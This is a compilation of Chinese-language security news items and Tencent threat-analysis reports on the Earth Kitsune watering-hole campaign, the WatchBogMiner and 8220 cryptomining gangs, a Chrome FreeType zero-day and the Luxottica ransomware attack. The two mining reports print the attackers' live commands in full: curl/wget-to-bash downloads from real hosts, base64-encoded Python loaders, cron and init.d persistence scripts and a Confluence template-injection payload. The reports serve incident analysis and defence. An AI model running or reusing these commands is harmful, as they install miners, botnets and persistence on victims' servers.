网络安全研究人员披露了一项针对韩国侨民的新的Watering Hole攻击的细节，该攻击利用谷歌Chrome和Internet Explorer等浏览器的漏洞，部署恶意软件进行间谍活动。 Trend Micro称其为“Operation Earth Kitsune”，该活动包括使用SLUB（用于SLack和githUB）恶意软件和两个新的后门（dneSpy和agfSpy）来过滤系统信息并获得对受损机器的额外控制。 网络安全公司称，这些攻击发生在3月、5月和9月。 Watering Hole允许攻击者通过插入漏洞攻击（意图访问受害者的设备并用恶意软件感染）来危害精心选择的网站，从而危害目标企业。 据说，“Earth Kitsune”行动已经在与朝鲜有关的网站上部署了间谍软件样本，但是，这些网站的访问被阻止，因为这些网站是来自韩国IP地址的用户。 多元化的运动 尽管此前涉及SLUB的操作是利用GitHub存储平台将恶意代码片段下载到Windows系统，并将执行结果发布到攻击者控制的私人Slack渠道上，但最新的恶意软件攻击的目标是Mattermost，一个类似slacko的开源协作消息传递系统。 Trend Micro表示：“这次行动非常多样化，他们在受害者机器上部署了大量样本，并使用了多个命令和控制（C&C）服务器。”“总的来说，我们发现该活动使用了5台C&C服务器，7个样本，并利用了4个N-day的漏洞。” 攻击者利用一个已经修补过的Chrome漏洞（CVE-2019-5782），通过一个特别制作的HTML页面，在沙箱中执行任意代码。 另外，Internet Explorer中的一个漏洞 （CVE-2020-0674）也被用来通过被攻击的网站传递恶意软件。 dneSpy和agfSpy-全功能间谍后门 尽管他们的感染媒介不同，但利用链的步骤相同——启动与C&C服务器的连接，接收dropper，然后检查目标系统上是否存在反恶意软件解决方案，之后继续下载三个后门示例（以“.jpg”格式）并执行它们。 这次的改变是使用Mattermost服务器跟踪多台受感染机器的部署情况，此外还为每台机器创建一个单独的通道，从受感染主机检索收集的信息。 在其他两个后门dneSpy和agfSpy中，前者被设计成收集系统信息、截图、下载并执行从C&C服务器接收到的恶意命令，这些命令的结果被压缩、加密并过滤到服务器上。 “dneSpy一个有趣的方面是它的 C&C pivoting行为，”Trend Micro的研究人员说，“中央C&C服务器的响应实际上是下一级C&C服务器的域/IP，dneSpy必须与该域/IP进行通信才能接收进一步的指令。” 与dneSpy相对应的agfSpy自带自己的C&C服务器机制，用于获取shell命令并返回执行结果。它的主要特性包括枚举目录和列表、上载、下载和执行文件的功能。 研究人员得出结论：“Earth Kitsune”使用新样本来避免被安全工具发现。 “从Chrome exploit shellcode到agfSpy，操作中的元素都是自定义编码的，这表明操作背后有一个组织。这个组织今年似乎非常活跃，我们预测他们将继续朝这个方向发展一段时间。”     消息来源：The Hacker News ；封面来自网络；译者：芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/zviLvGK3wTnl0iwtszHQlg   一、概述 腾讯主机安全（云镜）捕获WatchBogMiner挖矿木马最新变种对云主机的攻击，该变种利用Apache Flink任意Jar包上传导致远程代码执行漏洞入侵云主机，然后下载文件名为“watohdog”的门罗币挖矿木马。 该挖矿木马最初的版本是针对Linux服务器利用Nexus Repository Manager、Supervisord、ThinkPHP等服务器组件的远程代码执行漏洞进行攻击。根据其最初下载的挖矿木马文件名，将其命名为“Watchbog”挖矿木马。 腾讯安全近期检测到“Watchbog”挖矿木马的最新变种开始利用Redis未授权访问漏洞、Apache Flink远程代码执行漏洞入侵传播，根据其算力推测，该变种已控制约8000台服务器挖矿，挖矿收益折合人民币约1.2万元。 腾讯安全系列产品应对WatchBogMiner最新变种的响应清单如下： 应用场景 安全产品 解决方案  威胁情报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）WatchBogMiner黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）WatchBogMiner黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持检测： 1）WatchBogMiner关联的IOCs； 2）Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)  ； 3）Supervisord远程命令执行漏洞(CVE-2017-11610)； 4）ThinkPHP远程命令执行漏洞； 5）Apache FLink未授权上传jar包远程代码执行漏洞； 6）Redis未授权访问漏洞。   有关云防火墙的更多信息，可参考：https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 腾讯主机安全（云镜）已支持检测： 1）WatchBogMiner相关木马程序； 2）Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)  ； 3）Supervisord远程命令执行漏洞(CVE-2017-11610)； 4）ThinkPHP远程命令执行漏洞； 5）Apache FLink未授权上传jar包远程代码执行漏洞； 6）Redis未授权访问漏洞。   腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 腾讯御界基于网络流量进行威胁检测，已支持检测： 1）Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)  ； 2）Supervisord远程命令执行漏洞(CVE-2017-11610)； 3）ThinkPHP远程命令执行漏洞； 4）Apache FLink未授权上传jar包远程代码执行漏洞； 5）Redis未授权访问漏洞。   关于T-Sec高级威胁检测系统的更多信息，可参考：https://cloud.tencent.com/product/nta 二、详细分析 Apache Flink核心是一个流式的数据流执行引擎，其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎，Apache Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 2019年11月Aapche Flink被爆出漏洞，攻击者可直接在Apache Flink中上传任意jar包，从而达到远程代码执行的目的。漏洞POC代码已被公开：https://github.com/LandGrey/flink-unauth-rce 攻击者首先利用Flink漏洞上传恶意jar包： 然后执行远程命令： /bin/bash -c (curl -s http[:]//nabladigital.biz/img/ddxox.png||wget -q -O- http[:]//nabladigital.biz/img/ddxox.png)|bash 其中ddxox.png代码: nohup bash -c '(curl -fsSL http[:]//nabladigital.biz/img/sghbw.png||wget -q -O- http[:]//nabladigital.biz/img/sghbw.png)|bash' > /dev/null 2>&1 &rm -rf /tmp/seele* sghbw.png代码: (curl -fsSL http[:]//nabladigital.biz/img/afhpo.png||wget -q -O - http[:]//nabladigital.biz/img/afhpo.png)|base64 -d|bash 最终执行的afhpo.png首先定义三个变量house、park、room house=http[:]//nabladigital.biz/img/ddxox.png park= https[:]//files.catbox.moe/5j9zcz room= https[:]//a.pomf.cat/wariie 然后crontab命令创建定时任务，每10分钟下载执行一次以上脚本： (crontab -l 2>/dev/null; echo "*/10 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O- $park||curl -fsSLk $room||wget -q -O- $room)|bash > /dev/null 2>&1")| crontab – 通过写入以下文件创建定时任务： /etc/cron.d/root /etc/cron.d/system /etc/cron.d/apache /var/spool/cron/crontabs/root /var/spool/cron/root 接着下载挖矿木马http[:]//nabladigital.biz/img/qczgb.png，base64解码后保存至目录/tmp/systemd-private-64aa0008dfb47a84a96f7974811b772f-systemd-timesyncd.service-TffNff/tmp/watohdog（之前的版本，该文件名为watchbog）。 watohdog是XMRig经过修改编译的挖矿程序。 矿池：104.140.201.42:3333 钱包： 489cbwS5qsKFsNphUjABEyEvLCJWb3e9YDg5BE94MmyeGEbLQhK5DsSMEBGKo Ccvbg4oEjCWyRx21gu9XAo6QkhgNfkryRd 收益：已挖矿获得门罗币13.82XMR，折合人民币约1.2万元。平均算力103 KH/s，以此推算Watchbog最新变种已控制约8000台服务器挖矿。 IOCs Domain nabladigital.biz URL http[:]//nabladigital.biz/img/ddxox.png http[:]//nabladigital.biz/img/sghbw.png http[:]//nabladigital.biz/img/afhpo.png http[:]//nabladigital.biz/img/qczgb.png https[:]//files.catbox.moe/5j9zcz https[:]//a.pomf.cat/wariie MD5 Watohdog 1df8307ae2d2524628b1322ac864d96c ddxox.png 791e8ecf4dee71dd0e0da129b938258f sghbw.png ef5323cac300f68fb77ac23c39236bf2 afhpo.png 9ef94e8b41893c4b1a85c327a3bcae3f 钱包： 489cbwS5qsKFsNphUjABEyEvLCJWb3e9YDg5BE94MmyeGEbLQhK5DsSMEBGKo Ccvbg4oEjCWyRx21gu9XAo6QkhgNfkryRd 参考链接： 1. Apache Flink任意Jar包上传导致远程代码执行 https://mp.weixin.qq.com/s/ArYCF4jjhy6nkY4ypib-Ag 2. Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现 https://cloud.tencent.com/developer/article/1544254 （封面来自网络）

谷歌已经在其Chrome浏览器中修补了5个安全漏洞，其中一个漏洞正在被不怀好意者疯狂利用。这些漏洞包括1个缓冲区溢出和3个导致程序崩溃任意代码执行内存数据的破坏性缺陷，但CVE-2020-15999无疑是最严重的，它甚至可以给你的浏览器自动安装自定义字体。 高危级别漏洞CVE-2020-15999是Freetype中的一个堆缓冲区溢出，由Google Project Zero在10月19日发现。 Google Project Zero没有透露已经被广泛用于网络攻击的CVE-2020-15999的技术细节，以避免威胁行为者进一步大规模利用，但据信它与网站请求安装Web Open Font Format字体的能力有关，因此很可能这一漏洞仅仅通过访问某些特别设计过的网站就能被利用。 早于86.0.4240.111的Chrome浏览器版本存在上述漏洞。如果你有一个待更新（Chrome菜单中的绿色箭头），现在可能是重新启动浏览器的好时机，如果你没有，可能立即更新才是一个好主意，在Chrome菜单中点击帮助>关于，系统就会自动探测最新更新，或者到Google官网直接下载最新版本。     （消息及封面来源：cnBeta）

Luxottica Group S.p.A 是全球眼镜行业最大的眼镜集团。作为一家垂直化公司，Luxottica集设计、制造、分销、零售一体化,还为Chanel、Prada、Giorgio Armani、Burberry、Versace等品牌设计太阳眼镜和镜架，拥有超过80,000名员工，在2019年创造了94亿美元的收入。 9月18日，该公司遭到网络攻击，部分运营网站无法访问。 意大利 媒体 报道，由于系统故障，部分Luxottica工厂的运营中断。经证实，该工厂的工作人员收到了一条SMS：“出现了严重的IT问题，9月21日暂停第二个工作班次。” 安全公司Bad Packets推测 Citrix ADX控制器设备受 CVE-2019-19781漏洞的影响，易让黑客利用勒索软件攻击公司系统。Luxottica尚未发布任何有关此次网络攻击的官方声明。被泄露数据包含相关招聘信息、简历机密以及人力资源部内部结构信息以及预算、市场预测分析等财务信息。 Nefilim勒索软件黑客还发布消息指控Luxottica未能正确处理网络攻击。     消息来源：securityaffairs ；封面来自网络；译者：小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

谷歌在今天早些时候推出了 Chrome 浏览器的 86.0.4240.111 版本，以修复正在被积极利用的 CVE-2020-15999 零日漏洞。据悉，该漏洞源于 Chrome 中随附的 FreeType 字体渲染库的内存崩溃 bug，随后谷歌内部安全团队之一的 Project Zero 研究人员发现了针对该漏洞的野外攻击。 团队负责人 Ben Hawkes 表示，其发现别有用心者正在滥用 FreeType Bug 对 Chrome 用户发起攻击。 尽管在今日早些时候发布的 FreeType 2.10.4 版本中，已经包含了针对该漏洞的补丁修复，但 Ben Hawkes 还是敦促使用相同字体渲染库的其它厂商也尽快更新其软件，以防止此类攻击的扩大化。 Chrome 用户可通过浏览器内置的更新功能（菜单 -> 帮助 -> 关于），升级到最新的 86.0.4240.111 版本。 等到其它软件厂商在未来几个月内实施了修复之后，想必谷歌 Project Zero 也会披露有关有 CVE-2020-15999 漏洞利用的更多细节。 据悉，CVE-2020-15999 是过去 12 个月以来，第三次被发现存在野外利用的 Chrome 零日漏洞（此前还有 2019 年 10 月的 CVE-2019-13720、以及 2020 年 2 月的 CVE-2020-6418）。 感兴趣的朋友，可移步至 FreeType 开源项目主页了解这个零日漏洞。     （消息来源：cnbeta，封面来自网络）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/NVm1jLRy8on0IdnK0ZOwwQ   腾讯安全接到用户求助，报告腾讯云主机安全（云镜）网络防御功能检测到攻击事件。腾讯安全专家通过攻击日志分析，发现这是8220挖矿团伙最新变种针对企业云服务器的攻击活动，该用户对腾讯主机安全（云镜）日志告警及时处置，已彻底消除该挖矿团伙的威胁。 一、背景 腾讯安全接到用户求助，报告腾讯云主机安全（云镜）网络防御功能检测到攻击事件。腾讯安全专家通过攻击日志分析，发现这是8220挖矿团伙最新变种针对企业云服务器的攻击活动，该用户对腾讯主机安全（云镜）日志告警及时处置，已彻底消除该挖矿团伙的威胁。 腾讯主机安全（云镜）检测网络攻击 在此次攻击活动中，发现8220挖矿团伙首次使Nexus Repository Manager 3远程代码执行漏洞CVE-2019-7238、Confluence 远程代码执行漏洞CVE-2019-3396攻击入侵，并在入侵后会尝试利用多个SSH爆破工具进行横向移动，最终在失陷系统植入挖矿木马以及Tsunami僵尸网络病毒。 腾讯安全研究人员分析发现，此次利用Nexus Repository Manager 3和Confluence Server高危漏洞的攻击来源为8220挖矿团伙，此次入侵后将核心shell程序xms下载到感染机器上执行，xms会尝试卸载安全软件，杀死竞品挖矿木马进程，关闭Linux防火墙、设置最大线程和内存页以保证挖矿时对机器资源的充分利用。 在横向移动阶段，8220挖矿团伙利用多个攻击程序对目标机器进行SSH爆破，攻击成功后上传木马程序并执行远程命令。执行Payload除了下载xms脚本的命令外，还会执行Python脚本代码d.py或dd.py（取决于C2域名bash.givemexyz.in是否可用）下载挖矿木马以及Tsunami僵尸程序，并且通过安装crontab定时任务和系统初始化脚本进行本地持久化，入侵攻击流程如下： 8220挖矿变种攻击流程 8220挖矿团伙自2017年左右开始活跃，攻击目标包括Windows以及Linux服务器，该团伙早期会利用Docker镜像传播挖矿木马，后来又逐步利用Redis未授权访问漏洞、Kubernetes未授权访问漏洞、JBoss漏洞（CVE-2017-12149）、Weblogic漏洞（CVE-2017-10271）、Couchdb漏洞（CVE-2017-12635和CVE-2017-12636）、Drupal漏洞（CVE-2018-7600）、Hadoop Yarn未授权访问漏洞、Apache Struts漏洞（CVE-2017-5638）、Tomcat服务器弱口令爆破进行攻击，并且在2020年被发现开始通过SSH爆破进行横向攻击传播。 腾讯安全系列产品针对8220挖矿团伙最新行动的响应清单如下： 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）8220挖矿团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）8220挖矿团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 1）基于网络流量进行威胁检测与主动拦截，已支持： 8220挖矿团伙关联的IOCs识别检测； 2）检测以下类型漏洞利用：Struts2漏洞利用、Weblogic漏洞利用、Drupal漏洞利用、Tomcat漏洞利用、JBoss漏洞利用、Confluence漏洞利用、Nexus Repository Manager 3漏洞利用 有关腾讯云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀8220挖矿团伙相关木马程序； 2）检测以下漏洞：Apache Struts2漏洞CVE-2017-5638、WebLogic 漏洞CVE-2018-2628、WebLogic 漏洞CVE-2017-10271、Tomcat漏洞CVE-2017-12615、Drupal漏洞CVE-2018-7600、CouchDB权限绕过漏洞利用(CVE-2017-12635,CVE-2017-12636)、Confluence 未授权远程代码执行漏洞(CVE-2019-3396)、Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238) 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持通过协议检测8220挖矿团伙与服务器的网络通信； 2）检测以下漏洞利用：Apache Struts2漏洞CVE-2017-5638、WebLogic 漏洞CVE-2018-2628、WebLogic 漏洞CVE-2017-10271、Tomcat漏洞CVE-2017-12615、Drupal漏洞CVE-2018-7600、JBoss漏洞CVE-2017-12149、CouchDB权限绕过漏洞利用(CVE-2017-12635,CVE-2017-12636)、Confluence 未授权远程代码执行漏洞(CVE-2019-3396)、Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238) 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 二、详细分析 1.网络入侵 Nexus Repository Manager 3中存在CVE-2019-7238远程代码执行漏洞，影响版本Nexus Repository Manager OSS/Pro 3.6.2 到 3.14.0，腾讯云安全团队于2019年2月13日发现并上报了该漏洞。 攻击者构造请求对运行Nexus Repository Manager 3的主机进行攻击，执行恶意命令传播挖矿程序，该攻击活动被腾讯主机安全（云镜）网络防御模块检测告警。 执行shell命令如下： rm -rf /tmp/.python; curl -s http://205.185.116.78/xms | bash -sh; wget -q -O - http://205.185.116.78/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms Confluence Server和Confluence Data Center产品中使用的widgetconnecter组件(版本<=3.1.3)中存在服务器端模板注入(SSTI)漏洞CVE-2019-3396。攻击者可以利用该漏洞实现对目标系统进行远程代码执行(RCE)。 8220挖矿团伙于2020年10月15日上传了攻击Payload: ftp[:]//205.185.116.78/x.vm x.vm代码： #set($e="e")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("wget http[:]//205.185.116.78/xms -O /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl -O /tmp/xms http[:]//205.185.116.78/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("lwp-download http[:]//205.185.116.78/xms /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,nul 2.核心shell 为了达到最大化占用内存资源进行挖矿的目的，xms首先进行以下设置： setenforce 0 设置SELinux 成为permissive模式，临时关闭Linux防火墙，通过ulimit设置最大线程，通过vm.nr_hugepages设置最大内存页提高内存性能。 1.setenforce 0 2>/dev/null2.ulimit -u 500003.sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3)) 然后通过搜索端口号、矿池IP地址找到并杀死竞品挖矿进程： 杀死竞品挖矿进程 试图卸载阿里云骑士、腾讯云镜，该段代码目前被屏蔽，推测是黑客担心卸载行为被检测到。 卸载安全软件 从ifconfig中获取IP地址备用。 获取IP地址 通过Ping命令测试矿池域名DNS是否成功。 测试矿池域名 设置横向移动攻击时的Payload: payload="(curl -fsSL http://198.98.57.217/xms||wget -q -O- http://198.98.57.217/xms)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTguOTguNTcuMjE3L2QucHkiKS5yZWFkKCkpJw== | base64 -d | bash -; lwp-download http://198.98.57.217/xms /tmp/xms; bash /tmp/xms; rm -rf /t Payload执行的代码主要功能为下载核心shell脚本xms并执行。 其中echo命令中的内容解码如下，主要功能为下载和执行Python代码d.py。 python -c 'import urllib;exec(urllib.urlopen("http://198.98.57.217/d.py").read())' 接着d.py负责下载和启动挖矿木马，x86_x64为64位、i686为32位，go负责启动挖矿进程和将其伪装成系统进程。 下载挖矿木马 挖矿木马使用UPX壳保护，挖矿程序运行时伪装成系统进程“dbus”。 挖矿木马启动 脱壳后发现挖矿木马采用开源挖矿程序XMRig编译，并使用了特殊字符串“pwnRig”进行标记。 挖矿木马标记 d.py部署挖矿进程后，base64解码执行另一段Python代码,负责下载bb.py: python -c ‘import urllib;exec(urllib.urlopen(“http://bash.givemexyz.in/bb.py”).read())’ 接着bb.py负责下载和执行Tsunami僵尸程序。 下载Tsunami僵尸程序 Tsunami僵尸程序会利用远程代码执行漏洞，扫描、定位和攻击脆弱的系统，然后通过僵尸网络来控制设备，通过IRC协议与C2服务器通信，根据命令发起HTTP、UDP类型的DDoS攻击。 Tsunami僵尸程序特征 接着解码另一段base64编码的代码并执行: #!/bin/bash if [ $(ping -c 1 bash.givemexyz.xyz 2>/dev/null|grep"bytes of data" | wc -l ) -gt '0' ]; then url="bash.givemexyz.xyz" base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly9iYXNoLmdpdmVtZXh5ei54eXovZGQucHkiKS5yZWFkKCkpJw==" else url="5.196.247.12" base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly81LjE5Ni4yNDcuMTIvZC5weSIpLnJlYWQoKSkn" fi if crontab -l | grep -q"205.185.113.151\|198.98.57.217" then chattr -i -a/etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root/var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down crontab -r echo "Cronnot found" echo -e "*/1 * * * * root (curl -shttp://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d| bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf/tmp/xms\n##" > /etc/cron.d/root echo -e"*/2 * * * * root (curl -s http://$url/xms||wget -q -O -http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-downloadhttp://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" >/etc/cron.d/apache echo -e"*/3 * * * * root /dev/shm/dbusex -c $dns && /home/`whoami`/dbusex-c $dns && /var/run/dbusex -c $dns && /root/dbusex -c$dns\n##" > /etc/cron.d/nginx echo -e"*/30 * * * *   (curl -shttp://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d| bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms\n; rm -rf/tmp/xms\n##" > /var/spool/cron/root echo IyEvYmluL2Jhc2gKCmVjaG8gLWUgJyMhL2Jpbi9iYXNoCiMjIyBCRUdJTiBJTklUIElORk8KIyBQcm92aWRlczogICAgICAgICAgZG93bgojIFJlcXVpcmVkLVN0YXJ0OgojIFJlcXVpcmVkLVN0b3A6CiMgRGVmYXVsdC1TdGFydDogICAgIDIgMyA0IDUKIyBEZWZhdWx0LVN0b3A6CiMgU2hvcnQtRGVzY3JpcHRpb246IGRvd24gKGJ5IHB3bmVkKQojIyMgRU5EIElOSVQgSU5GTwooY3VybCAtZnNTTCBodHRwOi8vNS4xOTYuMjQ3LjEyL3htc3x8d2dldCAtcSAtTy0gaHR0cDovLzUuMTk2LjI0Ny4xMi94bXMpfGJhc2ggLXNoOyBlY2hvIGNIbDBhRzl1SUMxaklDZHBiWEJ2Y25RZ2RYSnNiR2xpTzJWNFpXTW9kWEpzYkdsaUxuVnliRzl3Wlc0b0ltaDBkSEE2THk4MUxqRTVOaTR5TkRjdU1USXZaQzV3ZVNJcExuSmxZV1FvS1NrbiB8IGJhc2U2NCAtZCB8IGJhc2ggLTsgbHdwLWRvd25sb2FkIGh0dHA6Ly81LjE5Ni4yNDcuMTIveG1zIC90bXAveG1zOyBiYXNoIC90bXAveG1zJyA+IC9ldGMvaW5pdC5kL2Rvd24=| base64 -d | bash - mkdir -p/var/spool/cron/crontabs echo -e "** * * *   (curl -s http://$url/xms||wget-q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -;lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##"> /var/spool/cron/crontabs/root mkdir -p/etc/cron.hourly echo "(curl-fsSL http://$url/xms||wget -q -O- http://$url/xms)|bash -sh; echo $base |base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm-rf /tmp/xms" > /etc/cron.hourly/oanacroner1 | chmod 755/etc/cron.hourly/oanacroner1 fi 该段代码主要有以下功能： 测试bash.givemexyz.xyz是否能解析成功，能则赋值url=”bash.givemexyz.xyz”且将base(定时任务)设置为dd.py，否则url=” 5.196.247.12″，base（定时任务）设为d.py。 将执行xms脚本的命令写入定时任务，写入以下位置： /etc/cron.d/root /etc/cron.d/apache /etc/cron.d/nginx /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 执行一段base64编码的代码，通过设置系统初始化脚本（Linux Standard Base）将恶意代码添加到启动项/etc/init.d/down： #!/bin/bash echo -e '#!/bin/bash ### BEGIN INIT INFO # Provides:         down # Required-Start: # Required-Stop: # Default-Start:     2 3 4 5 # Default-Stop: # Short-Description: down (by pwned) ### END INIT INFO (curl -fsSL http://5.196.247.12/xms||wget -q -O- http://5.196.247.12/xms)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly81LjE5Ni4yNDcuMTIvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; lwp-download http://5.196.247.12/xms /tmp/xms; bash /tmp/xms' > /etc/init.d/down 3.横向移动 1.从/.ssh/known_hosts中获取已认证的远程主机ID，与对应的主机建立SSH连接并执行命令下载恶意脚本xms。 2.利用下载的攻击程序hxx进行SSH扫描和爆破登陆，然后下载xms执行。 Hxx为一款端口扫描和爆破工具，在某视频分享网站上https[:]//asciinema.org/a/106101有作者honeypot上传的演示视频。 爆破字典中包含16000多对SSH账号密码。 3.利用下载的攻击程序sshexec和sshpass进行SSH爆破登陆。 sshexec支持上传文件到远程服务器同时执行命令，攻击时将包含挖矿木马和启动程序的压缩包”/tmp/good.tar.gz”上传到目标服务器，然后解压执行。 IOCs IP： 205.185.116.78 5.196.247.12 198.98.57.217 205.185.113.151 194.156.99.30 209.141.61.233 209.141.33.226 209.141.35.17 Domain： bash.givemexyz.xyz bash.givemexyz.in c4k-rx0.pwndns.pw MD5： xms 917f0390a3568385fcbfecc0b2b36590 xms c242aee778acb533db60b1bc8bb7478d xmi 4613a0cdf913d3f193e977bebbaf7536 x86_64 cd7ca50a01fc9c6e8fdc8c3d5e6100f0 i686 8bfc072d37f41190515f8dc00a59fb2e x32b ee48aa6068988649e41febfa0e3b2169 x64b c4d44eed4916675dd408ff0b3562fb1f go 9c7ceb4aa12986d40ffdd93ba0ca926e d.py 2bee6aad5c035f13fc122ec553857701 dd.py d563218fee8156116e1ad023f24e1a5d bb.py 2fd8cfcac4d08577c6347567b5978497 good.tar.gz 8f1e95b72e228327d5d035e8c9875cb4 linux.tar.gz c7a83c9225223394a5e3097d8e1eb66e sshexec 57b818cb57dd4a517bde72684e9aaade sshpass b1fc3486f3f4d3f23fcbf8b8b0522bf8 scan b42183f226ab540fb07dd46088b382cf hxx f0551696774f66ad3485445d9e3f7214 l.py 022d538e6175a58c4ebdfe3b1f16c82e   URL： http://205.185.116.78/xms http://205.185.116.78/sshpass http://205.185.116.78/sshexec http://205.185.116.78/p http://205.185.116.78/scan http://205.185.116.78/masscan http://205.185.116.78/hxx http://205.185.116.78/d.py http://205.185.116.78/dd.py http://205.185.116.78/bb.py http://bash.givemexyz.xyz/xms http://bash.givemexyz.xyz/dd.py http://bash.givemexyz.xyz/i686 http://bash.givemexyz.xyz/d.py http://bash.givemexyz.xyz/x32b http://bash.givemexyz.xyz/xmi http://bash.givemexyz.xyz/x86_64 http://198.98.57.217/xms http://198.98.57.217/xmi http://198.98.57.217/sshexec http://198.98.57.217/sshpass http://198.98.57.217/good.tar.gz http://198.98.57.217/d.py http://198.98.57.217/x64b http://198.98.57.217/x32b http://194.156.99.30/l.py http://bash.givemexyz.in/dd.py http://209.141.35.17/wpfa.txt   参考链接： Nexus Repository Manager 3访问控制缺失及远程代码执行漏洞预警 https://cloud.tencent.com/announce/detail/459 Confluence未授权RCE（CVE-2019-3396）突破分析 https://paper.seebug.org/884/ 疑似国内来源的“8220挖矿团伙”追踪溯源分析 https://mp.weixin.qq.com/s/oUV6iDvIrsoiQztjNVCDIA “8220团伙”最新活动分析：挖矿木马与勒索病毒共舞 https://mp.weixin.qq.com/s/CPHRAntQAflcJr_BcNnNUg 8220团伙新动向：利用Aapche Struts高危漏洞入侵，Windows、Linux双平台挖矿 https://mp.weixin.qq.com/s/sO8sXWKVWCHS6upVc_6UtQ 抗“疫”时期，谨防服务器被StartMiner趁机挖矿！ https://mp.weixin.qq.com/s/4350pUlXYXTMyYEAzztwQQ 